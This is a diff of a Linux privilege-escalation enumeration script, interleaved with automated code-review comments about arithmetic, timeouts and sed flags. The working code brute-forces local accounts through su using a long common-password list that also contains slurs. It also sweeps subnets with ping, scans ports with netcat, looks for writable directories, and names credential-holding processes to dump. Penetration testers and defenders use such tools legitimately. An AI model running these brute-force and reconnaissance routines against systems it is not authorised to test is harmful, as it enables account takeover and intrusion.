pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii green 
brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade +redsox philip monday mohammed indiana energy bond007 avalon terminator skipper shopping scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports siemens santiago kathleen hotmail hamster golfer future father enterprise clifford christina camille camaro beauty 55555555 vision tornado something rosemary qweasd patches magic helena denver cracker beaver basket atlanta vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood holiday gloria element chandler booger angelo allison action 99999999 target snowman miguel marley lorraine howard harmony children celtic beatrice airborne wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze jamaica emerald bubble brooke zombie strawberry spooky software simpson service sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock sunday skywalker salvador pegasus panthers packers network mission mark legolas lacrosse kitty kelly jester italia hiphop freeman charlie1 cardinal bluemoon bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer 
smile rockstar operator naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345 789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701 nascar music kristen kingkong global geronimo germany country christmas bernard benson wrestling warren techno sunrise stefan sister savage russell robinson oracle millie maddog lightning kingston kennedy hannibal garcia download dollar darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic darkside cleopatra blue assassin amelia vladimir roland +nigger national monique molly matthew1 godfather frank curtis change central cartman brothers boogie archie warriors universe turkey topgun solomon sherry sakura rush2112 qwaszx office mushroom monika marion lorenzo john herman connect chopper burton blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford million martha lindsay laura jamesbond ihateyou goober giants garden diana cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina justine english electric church castle caesar birdie aurora artist amadeus alberto 246810 whitney thankyou sterling star ronnie pussy printer picasso munchkin morpheus madmax kaiser 
julius imperial happiness goodluck counter columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor telephone smiley saints pretty oblivion newcastle mariana janice israel imagine freedom1 detroit deedee darren catfish adriana washington warlock valentina valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo motherfucker montreal manuel madrid kramer +katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c thompson theman strike stacey science running research polaris oklahoma mariposa marie leader julia island idontknow hitman german felipe fatcat fatboy defender applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston pauline passwort original nightmare miriam martinez labrador kristin kissme henry gerald garrett flash excalibur discovery dddddd danny collins casino broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha reggie redwings poison mypassword monopoly mariah margarita lionking king football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester street stones sprite spike single sherlock sandy rocker robin matt marianne linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid prodigy paul michel martini marathon longhorn leopard judith joanne jesus1 inferno holly harold happy123 esther dudley dragon1 darwin clinton celeste catdog 
brucelee argentina alpine 147852369 wrangler william1 vikings trigger stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation mystery morrison honda february fantasia designer coyote cool bulldogs bernie baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless dodgers delete cougar +charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens 
abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals +andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 
1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive +plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" +PASSTRY="2000" #Default num of passwds to try (all by default) + +if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this +SEDOVERFLOW=true +for grp in `groups $USER | cut -d ":" -f2`; do + wgroups="$wgroups -group $grp -or " +done +wgroups="`echo $wgroups | sed -e 's/ -or$//'`" +while $SEDOVERFLOW; do + #WF=`find /dev /srv /proc /home /media /sys /lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth $MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort` + #if [ "$MACPEAS" ]; then + WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | sort` #OpenBSD find command doesn't have "-writable" option + #else + # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort` + #fi + Wfolders=`printf "$WF" | tr '\n' '|'`"|[^\*][^\ ]*\ \*" + Wfolder="`printf "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`" + printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" >/dev/null 2>&1 + if [ $? 
-eq 0 ]; then + SEDOVERFLOW=false + else + MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1 + fi + if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop + SEDOVERFLOW=false + fi +done + +notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$|\.svg$" + +TIMEOUT="`command -v timeout 2>/dev/null`" +STRACE="`command -v strace 2>/dev/null`" +STRINGS="`command -v strings 2>/dev/null`" + +shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" + +notBackup="/tdbbackup$|/db_hotbackup$" + +cronjobsG=".placeholder|0anacron|0hourly|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart" +cronjobsB="centreon" + +processesVB="jdwp|tmux |screen |--inspect|--remote-debugging-port" +processesB="knockd\|splunk" +processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:" + +mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier" + 
+profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" + +knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" + +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ureadahead-stop.timer" + +commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib64$|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" +commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" + +ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" + 
+dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism" + +########################################### +#---------) Checks before start (---------# +########################################### +# --) ps working good +# --) Network binaries + +if [ `ps auxwww 2>/dev/null | wc -l 2>/dev/null` -lt 8 ]; then + NOUSEPS="1" +fi + +DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)" +FPING=$(command -v fping 2>/dev/null) +PING=$(command -v ping 2>/dev/null) +if [ "$FPING" ]; then + DISCOVER_BAN_GOOD="$GREEN$FPING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" +else + if [ "$PING" ]; 
then + DISCOVER_BAN_GOOD="$GREEN$PING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" + fi +fi + +SCAN_BAN_BAD="No port scan capabilities (nc not found)" +FOUND_NC=$(command -v nc 2>/dev/null) +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v netcat 2>/dev/null); +fi +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v ncat 2>/dev/null); +fi +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v nc.traditional 2>/dev/null); +fi +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v nc.openbsd 2>/dev/null); +fi +if [ "$FOUND_NC" ]; then + SCAN_BAN_GOOD="$GREEN$FOUND_NC$B is available for network discover & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)" +fi + + +########################################### +#-----------) Main Functions (------------# +########################################### + +echo_not_found (){ + printf $DG"$1 Not Found\n"$NC +} + +echo_no (){ + printf $DG"No\n"$NC +} + +print_ps (){ + (ls -d /proc/*/ 2>/dev/null | while read f; do + CMDLINE=`cat $f/cmdline 2>/dev/null | grep -av "seds,"`; #Delete my own sed processess + if [ "$CMDLINE" ]; + then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`; + printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; + fi; + done) 2>/dev/null | sort -r +} + su_try_pwd (){ USER=$1 PASSWORDTRY=$2 trysu=`echo "$PASSWORDTRY" | timeout 1 su $USER -c whoami 2>/dev/null` if [ "$trysu" ]; then - echo " You can login as $USER using password: $PASSWORDTRY" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + echo " You can login as $USER using password: $PASSWORDTRY" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," fi } 
@@ -465,23 +538,29 @@ check_if_su_brute(){ fi } +eval_bckgrd(){ + CMD_PARAM="$1" + eval "$1" & + CONT_THREADS=$(($CONT_THREADS+1)); if [ "$(($CONT_THREADS%$THREADS))" -eq "0" ]; then wait; fi +} + ########################################### #---------) Internet functions (----------# ########################################### check_tcp_80(){ - /bin/bash -c '(echo >/dev/tcp/1.1.1.1/80 && echo "Port 80 is accessible" || echo "Port 80 is not accessible") 2>/dev/null | grep "accessible"' + (timeout -s KILL 20 /bin/bash -c '( echo >/dev/tcp/1.1.1.1/80 && echo "Port 80 is accessible" || echo "Port 80 is not accessible") 2>/dev/null | grep "accessible"') 2>/dev/null || echo "Port 80 is not accessible" } check_tcp_443(){ - /bin/bash -c '(echo >/dev/tcp/1.1.1.8/443 && echo "Port 443 is accessible" || echo "Port 443 is not accessible") 2>/dev/null | grep "accessible"' + (timeout -s KILL 20 /bin/bash -c '(echo >/dev/tcp/1.1.1.1/443 && echo "Port 443 is accessible" || echo "Port 443 is not accessible") 2>/dev/null | grep "accessible"') 2>/dev/null || echo "Port 443 is not accessible" } check_icmp(){ - /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "icmp is available" || echo "icmp is not available") 2>/dev/null | grep "available"' + (timeout -s KILL 20 /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "Ping is available" || echo "Ping is not available") 2>/dev/null | grep "available"') 2>/dev/null || echo "Ping is not available" } #DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp #I cannot use this function because timeout doesn't find it, so it's copy/pasted below check_dns(){ - /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' + (timeout 20 /bin/bash -c '(( echo cfc9 0100 0001 
0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' ) 2>/dev/null || echo "DNS not available" } ########################################### @@ -490,7 +569,7 @@ check_dns(){ # Adapted from https://github.com/carlospolop/bashReconScan/blob/master/brs.sh basic_net_info(){ - printf $B"============================( "$GREEN"Basic Network Info"$B" )=============================\n"$NC + printf $B"═══════════════════════════╣ "$GREEN"Basic Network Info"$B" ╠═════════════════════════════\n"$NC (ifconfig || ip a) 2>/dev/null echo "" } @@ -509,11 +588,11 @@ icmp_recon (){ #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses) IP3=$(echo $1 | cut -d "." -f 1,2,3) - (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -E "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & - (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -E "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & for j in $(seq 0 254) do - (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -E "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & done wait } 
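Review bot: `eval_bckgrd` computes `$(($CONT_THREADS%$THREADS))` without checking `THREADS`, so if that variable (defined outside this hunk) is unset or 0 every call aborts the arithmetic with a division-by-zero error instead of reaping jobs; a safe form is `if [ "${THREADS:-0}" -gt 0 ] && [ "$((CONT_THREADS % THREADS))" -eq 0 ]; then wait; fi`. `CMD_PARAM="$1"` is assigned but never read inside the function, so it can go unless something else depends on it. The rewritten `check_tcp_80`, `check_tcp_443`, `check_icmp` and `check_dns` hard-code `timeout` even though the script already probes for it into `$TIMEOUT` earlier; on a host without that binary the `|| echo "... not accessible"` fallback reports a connectivity failure that never happened, so either reuse `$TIMEOUT` or print a distinct "check skipped" message when it is empty.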
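Review bot: The `sed -${E}` form introduced here (and in the tcp_recon, tcp_port_scan, discover_network and Basic-information hunks) depends on `E` being set somewhere outside these hunks; if it is ever empty the command becomes `sed - "s,...,"`, which sed does not accept as a flag, and the pipeline prints nothing, so the discovered hosts vanish from the output rather than merely losing their colour. A one-line assertion at the point where `E` is chosen, `: "${E:?extended-regex flag for sed not set}"`, turns that silent loss into an immediate, visible failure.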
@@ -528,7 +607,7 @@ tcp_recon (){ for port in $PORTS; do for j in $(seq 1 254) do - ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -E "s,[0-9\.],${C}[1;31m&${C}[0m,g") & + ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${C}[1;31m&${C}[0m,g") & done wait done @@ -538,7 +617,7 @@ tcp_port_scan (){ #Scan open ports of a host. Default: nmap top 1000, but the user can select others basic_net_info - printf $B"===================================( "$GREEN"Network Port Scanning"$B" )===================================\n"$NC + printf $B"═══════════════════════════════════╣ "$GREEN"Network Port Scanning"$B" ╠═══════════════════════════════════\n"$NC IP=$1 PORTS="$2" PORTS="`echo \"$PORTS\" | tr ',' ' '`" @@ -553,7 +632,7 @@ tcp_port_scan (){ fi for port in $PORTS; do - ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -E "s,[0-9\.],${C}[1;31m&${C}[0m,g") & + ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${C}[1;31m&${C}[0m,g") & done wait } @@ -562,7 +641,7 @@ discover_network (){ #Check if IP and Netmask are correct and the use fping or ping to find hosts basic_net_info - printf $B"====================================( "$GREEN"Network Discovery"$B" )=====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"Network Discovery"$B" ╠════════════════════════════════════\n"$NC DISCOVERY=$1 IP=$(echo $DISCOVERY | cut -d "/" -f 1) @@ -576,7 +655,7 @@ discover_network (){ #Using fping if possible if [ "$FPING" ]; then - $FPING -a -q -g $DISCOVERY | sed -E "s,.*,${C}[1;31m&${C}[0m," + $FPING -a -q -g $DISCOVERY | sed -${E} "s,.*,${C}[1;31m&${C}[0m," #Loop using ping else 
@@ -602,7 +681,7 @@ discovery_port_scan (){ basic_net_info #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389 - printf $B"============================( "$GREEN"Network Discovery (scanning ports)"$B" )=============================\n"$NC + printf $B"═══════════════════════════╣ "$GREEN"Network Discovery (scanning ports)"$B" ╠═════════════════════════════\n"$NC DISCOVERY=$1 MYPORTS=$2 
@@ -652,42 +731,15 @@ if ! [ "$NOTEXPORT" ]; then fi -########################################### -#-----------) Starting Output (-----------# -########################################### - -echo "" -if [ !"$QUIET" ]; then print_banner; fi -printf $B" $SCRIPTNAME $VERSION ${Y}by carlospolop\n"$NC; -echo "" -printf $Y"ADVISORY: "$B"$ADVISORY\n"$NC -echo "" -printf $B"Linux Privesc Checklist: "$Y"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC -echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," -echo " RED/YELLOW: 99% a PE vector" | sed "s,RED/YELLOW,${C}[1;31;103m&${C}[0m," -echo " RED: You must take a look at it" | sed "s,RED,${C}[1;31m&${C}[0m," -echo " LightCyan: Users with console" | sed "s,LightCyan,${C}[1;96m&${C}[0m," -echo " Blue: Users without console & mounted devs" | sed "s,Blue,${C}[1;34m&${C}[0m," -echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${C}[1;32m&${C}[0m," -echo " LightMangeta: Your username" | sed "s,LightMagenta,${C}[1;95m&${C}[0m," -if [ "$IAMROOT" ]; then - echo "" - echo " YOU ARE ALREADY ROOT!!! 
(it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${C}[1;31;103m&${C}[0m," - sleep 3 -fi -echo "" -echo "" - - ########################################### #-----------) Some Basic Info (-----------# ########################################### -printf $B"====================================( "$GREEN"Basic information"$B" )=====================================\n"$NC +printf $B"════════════════════════════════════╣ "$GREEN"Basic information"$B" ╠════════════════════════════════════\n"$NC printf $LG"OS: "$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -E "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelB,${C}[1;31m&${C}[0m," +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -${E} 
